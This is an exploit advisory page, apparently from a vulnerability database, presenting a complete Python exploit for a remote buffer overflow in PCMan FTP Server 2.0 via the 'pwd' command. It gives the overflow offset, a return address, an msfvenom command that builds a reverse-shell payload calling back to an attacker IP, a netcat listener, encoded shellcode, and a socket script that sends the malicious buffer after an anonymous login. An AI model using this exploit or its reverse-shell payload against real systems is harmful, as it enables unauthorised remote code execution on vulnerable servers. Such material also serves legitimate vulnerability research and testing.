PCMan FTP Server 2.0 Buffer Overflow

2024.02.06
Credit: Waqas Ahmed Faroouqi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow # Date: 09/25/2023 # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0 # Tested on: Windows XP SP3 #!/usr/bin/python import socket #buffer = 'A' * 2500 #offset = 2007 #badchars=\x00\x0a\x0d #return_address=0x7e429353 (USER32.dll) #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" #nc -nvlp 4444 overflow = ( "\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" "\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" "\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" "\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" "\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" "\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" "\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" "\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" "\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" "\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" "\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" "\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" "\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" "\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" "\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" "\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" "\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" "\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" "\xd7") shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow # Change IP/Port as required s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer..." s.connect(('192.168.146.135',21)) data = s.recv(1024) s.send('USER anonymous' +'\r\n') data = s.recv(1024) s.send('PASS anonymous\r\n') s.send('pwd ' + shellcode + '\r\n') s.close() print "\nExploit completed successfully!." except: print "Could not connect to FTP!"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top